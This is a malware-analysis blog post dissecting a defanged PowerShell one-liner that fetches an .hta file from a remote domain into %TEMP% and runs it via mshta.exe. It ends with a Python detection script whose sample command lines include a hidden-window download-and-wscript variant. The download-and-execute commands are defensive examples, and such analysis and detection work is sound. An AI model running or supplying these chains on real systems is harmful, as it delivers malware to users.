Analysis Malicious Powershell ( Part 4 )

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
By Diyar Saadi | WIN32 | July 15, 2025

In this article we briefly analyze a PowerShell one-liner that downloads an .hta file and runs it through mshta.exe.

Malware Sample : https://bazaar.abuse.ch/sample/d8f771c6ae73553fbbbf3d1bd0c19facaf69db4bc9663928789a970ca3e39f8b/

Malicious Code (defanged) :

powershell -Command "iwr http[://]booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; Start-Process mshta.exe -FilePath "$env:TEMP\x.hta""

Malicious Code Analysis :

1 - powershell -Command : the malware developer starts PowerShell and hands it the quoted string as the command to execute. Because the code is passed inline rather than as a .ps1 file, no script is written to disk at this stage and the execution policy, which only governs script files, does not get in the way.

2 - iwr http[://]booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta" : iwr is the built-in alias for Invoke-WebRequest. It requests the root of booknsvrf[.]com over plain HTTP and writes the response body to x.hta in the current user's %TEMP% folder ($env:TEMP). Note that the URL names no file; the server decides what is returned, and the .hta extension exists only because of the -OutFile name.

3 - Start-Process mshta.exe -FilePath "$env:TEMP\x.hta" : the malware developer intends to run the downloaded file with mshta.exe, the Microsoft HTML Application host that ships with Windows, so that the script inside the HTA executes with the rights of the current user. Strictly speaking, because -FilePath is given by name, PowerShell binds the .hta path to -FilePath and the positional mshta.exe to -ArgumentList, so the file is opened through its .hta file association, which is mshta.exe by default; the outcome is the same. Either way, the chain leaves two clear detection points: PowerShell writing an .hta into %TEMP% via Invoke-WebRequest, and PowerShell spawning mshta.exe with a %TEMP%\*.hta argument.
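The three steps above are the whole download-and-execute chain, and the same shape recurs with other fetch cmdlets and other LOLBins. As an added example (not code from the post or from the sample), the Python script below triages process-creation command lines of this kind: it pulls out the download cmdlet, the URL, the -OutFile drop path and the binary used to run the dropped file, checks whether the drop path is referenced a second time (i.e. executed), and assigns a verdict. The regex lists, the verdict names and the four sample command lines are assumptions constructed for this example; the first sample is the defanged one-liner analyzed above, and the URL pattern accepts both defanged (http[://], [.]) and raw forms so analyst notes can be fed in as-is.

```python
"""Triage helper for PowerShell download-and-execute one-liners.

Reads process-creation command lines (the CommandLine field of Sysmon Event ID 1
or Security Event 4688) and, for each, extracts the download cmdlet, the URL, the
-OutFile drop path and the LOLBin used to run the dropped file, then assigns a
verdict. The sample lines at the bottom are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Cmdlets, aliases and tools that fetch content from the network (assumed list).
DOWNLOAD_RE = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|start-bitstransfer|curl|wget)\b"
)
# URL, raw or defanged; stops at whitespace, a quote or a statement separator.
URL_RE = re.compile(r"(?i)\b(?:hxxps?|https?)(?:://|\[://\])[^\s\"';,]+")
# Path handed to -OutFile, with or without surrounding quotes.
OUTFILE_RE = re.compile(r"(?i)-OutFile\s+\"?([^\"\s;]+)")
# Windows binaries commonly used to execute a dropped script or document (assumed list).
LOLBIN_RE = re.compile(
    r"(?i)\b(mshta|wscript|cscript|rundll32|regsvr32|certutil|msiexec)(?:\.exe)?\b"
)


@dataclass
class Finding:
    command_line: str
    download_cmdlet: Optional[str]
    url: Optional[str]
    drop_path: Optional[str]
    lolbin: Optional[str]
    drop_path_reused: bool  # the dropped file's path appears again, i.e. it is executed
    verdict: str


def analyze(cmd: str) -> Finding:
    """Extract the chain's components from one command line and rate it."""
    dl = DOWNLOAD_RE.search(cmd)
    url = URL_RE.search(cmd)
    out = OUTFILE_RE.search(cmd)
    lb = LOLBIN_RE.search(cmd)
    drop_path = out.group(1) if out else None
    reused = bool(drop_path) and cmd.count(drop_path) >= 2

    if dl and lb:
        verdict = "download-and-execute"
    elif dl:
        verdict = "download-only"
    elif lb:
        verdict = "lolbin-only"
    else:
        verdict = "no-match"

    return Finding(
        command_line=cmd,
        download_cmdlet=dl.group(1).lower() if dl else None,
        url=url.group(0) if url else None,
        drop_path=drop_path,
        lolbin=lb.group(1).lower() if lb else None,
        drop_path_reused=reused,
        verdict=verdict,
    )


def triage(lines: List[str]) -> List[Finding]:
    return [analyze(line) for line in lines]


# Constructed sample command lines (not telemetry from the original post).
SAMPLE_COMMAND_LINES = [
    # 1: the defanged one-liner from the post
    r'powershell -Command "iwr http[://]booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; '
    r'Start-Process mshta.exe -FilePath "$env:TEMP\x.hta""',
    # 2: same chain with the full cmdlet name, a hidden window and a different LOLBin
    r'powershell.exe -NoP -W Hidden -Command "Invoke-WebRequest http://example.invalid/p.vbs '
    r'-OutFile C:\Users\Public\p.vbs; Start-Process wscript.exe -ArgumentList C:\Users\Public\p.vbs"',
    # 3: download only, nothing executed (typical admin use)
    r'powershell -Command "Invoke-WebRequest https://intranet.example/tools.zip -OutFile C:\Temp\tools.zip"',
    # 4: mshta without any download; needs context, but it is not this chain
    r'mshta.exe "C:\Program Files\Vendor\help.hta"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f"{f.verdict:22} url={f.url} drop={f.drop_path} via={f.lolbin} reused={f.drop_path_reused}")
```

The "download-and-execute" verdict is the one worth alerting on; "download-only" and "lolbin-only" lines are far more common in normal administration and should be reviewed with parent-process and user context rather than alerted on blindly. Feeding the post's defanged command through the script returns the URL http[://]booknsvrf[.]com/, the drop path $env:TEMP\x.hta, the LOLBin mshta, and a reused drop path, which is exactly the chain described in the three steps above.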